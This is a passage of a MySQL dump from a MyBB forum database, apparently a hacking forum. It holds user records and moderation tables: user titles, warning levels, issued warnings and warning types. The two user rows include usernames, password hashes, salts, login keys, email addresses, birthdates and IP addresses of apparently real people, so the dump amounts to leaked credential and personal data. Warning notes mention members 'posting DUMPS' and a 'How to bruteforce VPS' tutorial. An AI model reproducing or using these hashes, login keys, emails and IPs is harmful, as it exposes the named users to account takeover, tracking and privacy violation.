`showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('344', 'Goolge+', '13d0b3d1593a5de0407e78f43efa9bcd', 'nXRQO18T', 'HhtzXQZGb5zjX9CKrDJb23mHlG7Fbjnunuf2yUU1U4NuFMehG6', 'google_kimtien@yahoo.com', '0', '', '', '', '2', '', '0', '', '1352622844', '1352622844', '1352622844', '0', '', '0', '', '', '', '7-11-1991', 'all', '', '1', '1', '0', '0', '1', '0', '1', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '7', '0', '2', '', '', '0', '0', '0', '0', '', '', '', '0', '0', '0', '123.23.218.116', '', '2065160820', '0', 'english', '0', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '1'); INSERT INTO `mybb_users` (`uid`, `username`, `password`, `salt`, `loginkey`, `email`, `postnum`, `avatar`, `avatardimensions`, `avatartype`, `usergroup`, `additionalgroups`, `displaygroup`, `usertitle`, `regdate`, `lastactive`, `lastvisit`, `lastpost`, `website`, `icq`, `aim`, `yahoo`, `msn`, `birthday`, `birthdayprivacy`, `signature`, `allownotices`, `hideemail`, `subscriptionmethod`, `invisible`, `receivepms`, `receivefrombuddy`, `pmnotice`, `pmnotify`, `threadmode`, `showsigs`, `showavatars`, `showquickreply`, `showredirect`, `ppp`, `tpp`, `daysprune`, `dateformat`, `timeformat`, `timezone`, `dst`, `dstcorrection`, `buddylist`, `ignorelist`, `style`, `away`, `awaydate`, `returndate`, `awayreason`, `pmfolders`, `notepad`, `referrer`, `referrals`, `reputation`, `regip`, `lastip`, `longregip`, `longlastip`, `language`, `timeonline`, `showcodebuttons`, `totalpms`, `unreadpms`, `warningpoints`, `moderateposts`, `moderationtime`, `suspendposting`, `suspensiontime`, `suspendsignature`, `suspendsigtime`, `coppauser`, `classicpostbit`, `loginattempts`, `failedlogin`, `usernotes`, `privatewarning`, `achivements`, `threads`, `forcepwchange`) VALUES ('346', 'TheBlueCat97', '8c96bd77b875f88ea97b34b9fc3865ae', 'P6OK7Mq5', 'aPxuo7kwv2JHRKl2xZcmSs7qBrhIl5ZJasWTx2XGs31tZOFs2b', 'thebluecat97@aol.com', '5', '', '', '', '2', '', '0', '', '1352768580', '1352809410', '1352805844', '1352804815', '', '0', '', '', '', '22-4-1999', 'all', '[img]http://puu.sh/1pBH1[/img] subscribe to meh on YouTube pl0x', '1', '0', '0', '0', '1', '0', '2', '0', 'linear', '1', '1', '1', '1', '0', '0', '0', '', '', '-4', '1', '2', '', '', '0', '0', '0', '0', '', '1**Inbox$%%$2**Sent Items$%%$3**Drafts$%%$4**Trash Can', '', '0', '0', '0', '70.174.59.159', '70.174.59.159', '1185823647', '1185823647', '', '3552', '1', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '0', '', '', 'b:0;', '0', '0'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_usertitles`; CREATE TABLE `mybb_usertitles` ( `utid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `posts` int(10) unsigned NOT NULL DEFAULT '0', `title` varchar(250) NOT NULL DEFAULT '', `stars` smallint(4) NOT NULL DEFAULT '0', `starimage` varchar(120) NOT NULL DEFAULT '', PRIMARY KEY (`utid`) ) ENGINE=MyISAM AUTO_INCREMENT=8 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_usertitles` WRITE; INSERT INTO `mybb_usertitles` (`utid`, `posts`, `title`, `stars`, `starimage`) VALUES ('1', '0', 'Alpha', '1', ''); INSERT INTO `mybb_usertitles` (`utid`, `posts`, `title`, `stars`, `starimage`) VALUES ('2', '50', 'Beta', '2', ''); INSERT INTO `mybb_usertitles` (`utid`, `posts`, `title`, `stars`, `starimage`) VALUES ('3', '250', 'Gamma', '3', ''); INSERT INTO `mybb_usertitles` (`utid`, `posts`, `title`, `stars`, `starimage`) VALUES ('4', '1000', 'Delta', '4', ''); INSERT INTO `mybb_usertitles` (`utid`, `posts`, `title`, `stars`, `starimage`) VALUES ('5', '2500', 'Epsilon', '5', ''); INSERT INTO `mybb_usertitles` (`utid`, `posts`, `title`, `stars`, `starimage`) VALUES ('6', '5000', 'Zeta', '6', '{theme}/star.gif'); INSERT INTO `mybb_usertitles` (`utid`, `posts`, `title`, `stars`, `starimage`) VALUES ('7', '10000', 'Sigma', '7', '{theme}/star.gif'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_warninglevels`; CREATE TABLE `mybb_warninglevels` ( `lid` int(10) unsigned NOT NULL AUTO_INCREMENT, `percentage` int(3) NOT NULL DEFAULT '0', `action` text NOT NULL, PRIMARY KEY (`lid`) ) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_warninglevels` WRITE; INSERT INTO `mybb_warninglevels` (`lid`, `percentage`, `action`) VALUES ('1', '95', 'a:3:{s:4:\"type\";i:1;s:9:\"usergroup\";i:7;s:6:\"length\";i:15552000;}'); INSERT INTO `mybb_warninglevels` (`lid`, `percentage`, `action`) VALUES ('2', '70', 'a:2:{s:4:\"type\";i:3;s:6:\"length\";i:1209600;}'); INSERT INTO `mybb_warninglevels` (`lid`, `percentage`, `action`) VALUES ('3', '80', 'a:2:{s:4:\"type\";i:2;s:6:\"length\";i:1296000;}'); INSERT INTO `mybb_warninglevels` (`lid`, `percentage`, `action`) VALUES ('4', '90', 'a:3:{s:4:\"type\";i:1;s:9:\"usergroup\";i:10;s:6:\"length\";i:604800;}'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_warnings`; CREATE TABLE `mybb_warnings` ( `wid` int(10) unsigned NOT NULL AUTO_INCREMENT, `uid` int(10) unsigned NOT NULL DEFAULT '0', `tid` int(10) unsigned NOT NULL DEFAULT '0', `pid` int(10) unsigned NOT NULL DEFAULT '0', `title` varchar(120) NOT NULL DEFAULT '', `points` int(10) unsigned NOT NULL DEFAULT '0', `dateline` bigint(30) NOT NULL DEFAULT '0', `issuedby` int(10) unsigned NOT NULL DEFAULT '0', `expires` bigint(30) NOT NULL DEFAULT '0', `expired` int(1) NOT NULL DEFAULT '0', `daterevoked` bigint(30) NOT NULL DEFAULT '0', `revokedby` int(10) unsigned NOT NULL DEFAULT '0', `revokereason` text NOT NULL, `notes` text NOT NULL, PRIMARY KEY (`wid`) ) ENGINE=MyISAM AUTO_INCREMENT=21 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_warnings` WRITE; INSERT INTO `mybb_warnings` (`wid`, `uid`, `tid`, `pid`, `title`, `points`, `dateline`, `issuedby`, `expires`, `expired`, `daterevoked`, `revokedby`, `revokereason`, `notes`) VALUES ('1', '4', '8', '0', '', '10', '1340001003', '1', '1340433003', '1', '1340001216', '1', 'test completed.', 'test'); INSERT INTO `mybb_warnings` (`wid`, `uid`, `tid`, `pid`, `title`, `points`, `dateline`, `issuedby`, `expires`, `expired`, `daterevoked`, `revokedby`, `revokereason`, `notes`) VALUES ('2', '21', '0', '0', 'Test', '75', '1343932836', '20', '1343936436', '1', '0', '0', '', 'Test.'); INSERT INTO `mybb_warnings` (`wid`, `uid`, `tid`, `pid`, `title`, `points`, `dateline`, `issuedby`, `expires`, `expired`, `daterevoked`, `revokedby`, `revokereason`, `notes`) VALUES ('3', '21', '0', '0', 'Test', '2', '1344300771', '20', '1344304371', '1', '0', '0', '', 'Test'); INSERT INTO `mybb_warnings` (`wid`, `uid`, `tid`, `pid`, `title`, `points`, `dateline`, `issuedby`, `expires`, `expired`, `daterevoked`, `revokedby`, `revokereason`, `notes`) VALUES ('4', '4', '1', '0', '', '20', '1344902259', '1', '1345593459', '1', '1344902364', '1', 'Test expired. ', 'knm'); INSERT INTO `mybb_warnings` (`wid`, `uid`, `tid`, `pid`, `title`, `points`, `dateline`, `issuedby`, `expires`, `expired`, `daterevoked`, `revokedby`, `revokereason`, `notes`) VALUES ('5', '4', '6', '0', '', '40', '1344902308', '1', '1345766308', '1', '1344902378', '1', 'test completed. ', 'idk'); INSERT INTO `mybb_warnings` (`wid`, `uid`, `tid`, `pid`, `title`, `points`, `dateline`, `issuedby`, `expires`, `expired`, `daterevoked`, `revokedby`, `revokereason`, `notes`) VALUES ('6', '86', '10', '0', '', '30', '1345556902', '1', '1346766502', '1', '0', '0', '', 'Posting DUMPS'); INSERT INTO `mybb_warnings` (`wid`, `uid`, `tid`, `pid`, `title`, `points`, `dateline`, `issuedby`, `expires`, `expired`, `daterevoked`, `revokedby`, `revokereason`, `notes`) VALUES ('7', '86', '10', '0', '', '30', '1345556925', '1', '1346766525', '1', '0', '0', '', 'Again Posting DUMPS'); INSERT INTO `mybb_warnings` (`wid`, `uid`, `tid`, `pid`, `title`, `points`, `dateline`, `issuedby`, `expires`, `expired`, `daterevoked`, `revokedby`, `revokereason`, `notes`) VALUES ('8', '4', '14', '0', '', '20', '1345934760', '1', '1346453160', '1', '0', '0', '', 'No credits. '); INSERT INTO `mybb_warnings` (`wid`, `uid`, `tid`, `pid`, `title`, `points`, `dateline`, `issuedby`, `expires`, `expired`, `daterevoked`, `revokedby`, `revokereason`, `notes`) VALUES ('9', '127', '1', '0', '', '20', '1345936152', '1', '1346627352', '1', '1345936203', '1', 'He is new. ', 'Adult Content'); INSERT INTO `mybb_warnings` (`wid`, `uid`, `tid`, `pid`, `title`, `points`, `dateline`, `issuedby`, `expires`, `expired`, `daterevoked`, `revokedby`, `revokereason`, `notes`) VALUES ('10', '54', '9', '1196', '', '20', '1346117903', '1', '1346809103', '1', '0', '0', '', 'Spamming with hire me for admin in posts. '); INSERT INTO `mybb_warnings` (`wid`, `uid`, `tid`, `pid`, `title`, `points`, `dateline`, `issuedby`, `expires`, `expired`, `daterevoked`, `revokedby`, `revokereason`, `notes`) VALUES ('11', '67', '0', '0', 'Stop making false reports.', '1', '1346429556', '20', '1346515956', '1', '0', '0', '', 'Entering false reports.'); INSERT INTO `mybb_warnings` (`wid`, `uid`, `tid`, `pid`, `title`, `points`, `dateline`, `issuedby`, `expires`, `expired`, `daterevoked`, `revokedby`, `revokereason`, `notes`) VALUES ('12', '82', '15', '1680', '', '15', '1347122783', '1', '1347727583', '1', '0', '0', '', 'Low Quality Posting'); INSERT INTO `mybb_warnings` (`wid`, `uid`, `tid`, `pid`, `title`, `points`, `dateline`, `issuedby`, `expires`, `expired`, `daterevoked`, `revokedby`, `revokereason`, `notes`) VALUES ('13', '53', '2', '1871', '', '10', '1347545798', '61', '1348150598', '1', '0', '0', '', 'Try to solve problems in a different way, instead of telling people to shut up and getting angry for no reason.'); INSERT INTO `mybb_warnings` (`wid`, `uid`, `tid`, `pid`, `title`, `points`, `dateline`, `issuedby`, `expires`, `expired`, `daterevoked`, `revokedby`, `revokereason`, `notes`) VALUES ('14', '82', '9', '0', '', '20', '1347737704', '61', '1348428904', '1', '0', '0', '', 'No spam posts Please.'); INSERT INTO `mybb_warnings` (`wid`, `uid`, `tid`, `pid`, `title`, `points`, `dateline`, `issuedby`, `expires`, `expired`, `daterevoked`, `revokedby`, `revokereason`, `notes`) VALUES ('15', '5', '14', '0', '', '20', '1349234697', '1', '1349753097', '1', '0', '0', '', 'No credits on the \"How to bruteforce VPS\" tutorial.'); INSERT INTO `mybb_warnings` (`wid`, `uid`, `tid`, `pid`, `title`, `points`, `dateline`, `issuedby`, `expires`, `expired`, `daterevoked`, `revokedby`, `revokereason`, `notes`) VALUES ('16', '3', '2', '3306', '', '10', '1349395907', '61', '1350000707', '1', '1349494667', '1', 'Revoked because they requested another chance. ', 'Calm down. It\'s embarrasing..'); INSERT INTO `mybb_warnings` (`wid`, `uid`, `tid`, `pid`, `title`, `points`, `dateline`, `issuedby`, `expires`, `expired`, `daterevoked`, `revokedby`, `revokereason`, `notes`) VALUES ('17', '224', '0', '0', 'Promoting Different Site.', '15', '1350152353', '61', '1350757153', '1', '0', '0', '', 'You are not allowed to promote a Different hacking site, No matter what.'); INSERT INTO `mybb_warnings` (`wid`, `uid`, `tid`, `pid`, `title`, `points`, `dateline`, `issuedby`, `expires`, `expired`, `daterevoked`, `revokedby`, `revokereason`, `notes`) VALUES ('18', '214', '0', '0', 'Vulgar Adult content ', '50', '1350647924', '61', '1353239924', '0', '0', '0', '', 'Disgusting. '); INSERT INTO `mybb_warnings` (`wid`, `uid`, `tid`, `pid`, `title`, `points`, `dateline`, `issuedby`, `expires`, `expired`, `daterevoked`, `revokedby`, `revokereason`, `notes`) VALUES ('19', '257', '11', '6478', '', '15', '1351355851', '1', '1351960651', '1', '0', '0', '', 'Constantly posting suggestions in the announcements section.'); INSERT INTO `mybb_warnings` (`wid`, `uid`, `tid`, `pid`, `title`, `points`, `dateline`, `issuedby`, `expires`, `expired`, `daterevoked`, `revokedby`, `revokereason`, `notes`) VALUES ('20', '53', '15', '0', '', '15', '1352599233', '61', '1353204033', '0', '0', '0', '', 'Second time.'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_warningtypes`; CREATE TABLE `mybb_warningtypes` ( `tid` int(10) unsigned NOT NULL AUTO_INCREMENT, `title` varchar(120) NOT NULL DEFAULT '', `points` int(10) unsigned NOT NULL DEFAULT '0', `expirationtime` bigint(30) NOT NULL DEFAULT '0', PRIMARY KEY (`tid`) ) ENGINE=MyISAM AUTO_INCREMENT=16 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_warningtypes` WRITE; INSERT INTO `mybb_warningtypes` (`tid`, `title`, `points`, `expirationtime`) VALUES ('1', 'Adult Content', '20', '691200'); INSERT INTO `mybb_warningtypes` (`tid`, `title`, `points`, `expirationtime`) VALUES ('2', 'Nonsense', '10', '604800'); INSERT INTO `mybb_warningtypes` (`tid`, `title`, `points`, `expirationtime`) VALUES ('3', 'Profile Violation', '15', '604800'); INSERT INTO `mybb_warningtypes` (`tid`, `title`, `points`, `expirationtime`) VALUES ('4', 'Cross Posting', '20', '777600'); INSERT INTO `mybb_warningtypes` (`tid`, `title`, `points`, `expirationtime`) VALUES ('5', 'Reputation Abuse', '25', '1209600'); INSERT INTO `mybb_warningtypes` (`tid`, `title`, `points`, `expirationtime`) VALUES ('6', 'Threat or Harassment ', '40', '864000'); INSERT INTO `mybb_warningtypes` (`tid`, `title`, `points`, `expirationtime`) VALUES ('7', 'Personal Data', '15', '720000'); INSERT INTO `mybb_warningtypes` (`tid`, `title`, `points`, `expirationtime`) VALUES ('8', 'Off topic or Unrelated', '10', '432000'); INSERT INTO `mybb_warningtypes` (`tid`, `title`, `points`, `expirationtime`) VALUES ('9', 'SPAM', '20', '691200'); INSERT INTO `mybb_warningtypes` (`tid`, `title`, `points`, `expirationtime`) VALUES ('10', 'Disallowed Blackhat Activity', '30', '1209600'); INSERT INTO `mybb_warningtypes` (`tid`, `title`, `points`, `expirationtime`) VALUES ('11', 'Wrong Forum', '15', '604800'); INSERT INTO `mybb_warningtypes` (`tid`, `title`, `points`, `expirationtime`) VALUES ('12', 'Infected download or link', '25', '1209600'); INSERT INTO `mybb_warningtypes` (`tid`, `title`, `points`, `expirationtime`) VALUES ('13', 'Donation Begging', '10', '604800'); INSERT INTO `mybb_warningtypes` (`tid`, `title`, `points`, `expirationtime`) VALUES ('14', 'Leeching', '20', '518400'); INSERT INTO `mybb_warningtypes` (`tid`, `title`, `points`, `expirationtime`) VALUES ('15', 'Low Quality Posting', '15', '604800'); UNLOCK TABLES;